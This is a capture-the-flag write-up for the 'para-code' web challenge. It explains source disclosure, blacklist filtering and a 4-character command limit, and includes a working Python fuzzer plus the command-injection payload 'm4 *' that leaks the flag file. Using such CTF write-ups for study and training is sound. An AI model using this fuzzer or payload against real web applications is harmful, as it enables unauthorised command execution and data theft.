para-code

Info

Category: Web Exploitation
Difficulty: Medium

Challenge Overview

This is a common type of web challenge: the application shows us its own source code only once we request index.php.

<?php
require __DIR__ . '/flag.php';        // the flag lives in a separate file in the same directory
if (!isset($_GET['start'])){         // no ?start= parameter in the request
    show_source(__FILE__);            // ... so the script prints its own source and stops
    exit;
} 

This means that if the URL carries no start parameter, the page prints its own source code. That is a serious weakness, because reading the source tells us exactly how the flag is protected and therefore how to get it.

Blacklist Filtering

The next important lines of code are:

$blackList = array(
  'ss','sc','aa', .. );

which tells us that the value of the start parameter must not contain any of the listed strings. A blacklist like this can usually be bypassed, since it only forbids specific fragments instead of whitelisting what is allowed.

Command Length Restriction

  • The value of the start parameter (the command) must be 4 characters or fewer.

Vulnerability Analysis

With these three constraints in mind (source disclosure, the blacklist and the 4-character limit), I understood the type of challenge I was tackling: a command injection leading to remote code execution (RCE) through a restricted parameter. This is what I did to exploit it.

Payload Generation

This command generates every 2-character shell command available on the system that is not blacklisted and appends a space and * to each one (exactly 4 characters, so the * glob expands to every file in the current directory), producing a wordlist that can then be fuzzed with a tool or a Python script.

Note: it is important to generate the list from BASH rather than ZSH, otherwise you will not get ALL commands.

Fuzzing the start Parameter

Then fuzz the start parameter with every entry of that list, using a tool or a script like this one:
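The author's own generator command and fuzzing script are not reproduced on this page. The following is an added example, not the writeup's code: it enumerates executables directly from the PATH directories (so the result does not depend on whether bash or zsh is the interactive shell), keeps only candidates that survive the blacklist and the 4-character limit once " *" is appended, and sends each one as the start parameter. The target URL, the flag marker string, the substring semantics of the blacklist check and the three blacklist entries are assumptions; the page quotes only the first entries of the real blacklist.

```python
#!/usr/bin/env python3
"""Added example (not the writeup's script): build short command payloads and
fuzz the ?start= parameter with them.

Assumptions not stated on the page: the blacklist check is a substring match,
TARGET and FLAG_MARKER are placeholders, and BLACKLIST holds only the three
entries the writeup quotes (extend it from the real source).
"""
import os
import sys
import urllib.parse
import urllib.request

BLACKLIST = ["ss", "sc", "aa"]                 # only the entries visible on the page
MAX_LEN = 4                                    # the challenge's length limit on start
TARGET = "http://challenge.local/index.php"    # placeholder, assumed
FLAG_MARKER = "flag{"                          # assumed flag prefix


def executables_in_path(path=None):
    """Collect executable file names from every PATH directory.

    Reading PATH directly avoids the bash/zsh difference the writeup warns
    about: the list does not depend on any shell's completion machinery.
    """
    names = set()
    for d in (path if path is not None else os.environ.get("PATH", "")).split(os.pathsep):
        try:
            for n in os.listdir(d):
                full = os.path.join(d, n)
                if os.path.isfile(full) and os.access(full, os.X_OK):
                    names.add(n)
        except OSError:
            continue                           # unreadable or missing directory
    return sorted(names)


def is_allowed(payload, blacklist=BLACKLIST, max_len=MAX_LEN):
    """True if payload passes both filters: length limit and no blacklisted substring."""
    if len(payload) > max_len:
        return False
    return not any(bad in payload for bad in blacklist)


def build_payloads(commands, blacklist=BLACKLIST, max_len=MAX_LEN):
    """Append ' *' to each command and keep what the filters would accept.

    With max_len 4 only two-character commands survive ('m4 *' is exactly 4).
    """
    return [f"{c} *" for c in sorted(set(commands)) if is_allowed(f"{c} *", blacklist, max_len)]


def build_url(payload, target=TARGET):
    """URL-encode the payload as the start parameter (space -> '+', '*' -> '%2A')."""
    return target + "?" + urllib.parse.urlencode({"start": payload})


def fuzz(payloads, target=TARGET, marker=FLAG_MARKER, timeout=5):
    """Send each payload; return (payload, body) pairs whose response contains marker."""
    hits = []
    for p in payloads:
        try:
            with urllib.request.urlopen(build_url(p, target), timeout=timeout) as resp:
                body = resp.read().decode(errors="replace")
        except Exception as exc:               # network errors, 4xx/5xx, timeouts
            print(f"[!] {p!r}: {exc}", file=sys.stderr)
            continue
        if marker in body:
            hits.append((p, body))
    return hits


if __name__ == "__main__":
    candidates = build_payloads(executables_in_path())
    print(f"{len(candidates)} candidate payloads, e.g. {candidates[:5]}")
    for payload, body in fuzz(candidates):
        print(f"[+] {payload!r} ->\n{body}")
```

Run it on the attacking machine with the real blacklist pasted into BLACKLIST and TARGET pointing at the challenge; every response containing the flag marker is printed together with the payload that produced it. Because the glob is expanded by the target's shell, a command that merely reads its arguments and echoes them (as m4 does when no macros are defined) is enough to leak flag.php.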

Flag Disclosure

It turned out that m4 * was the right command: it is exactly 4 characters, m4 is not blacklisted, and because none of the files in the directory define any m4 macros, m4 simply echoes each file it is given as input, so the contents of flag.php (and with it the flag) end up in the response. If you had generated the command list in a ZSH shell you would not have got m4, and that was the only correct solution.

made by k0d
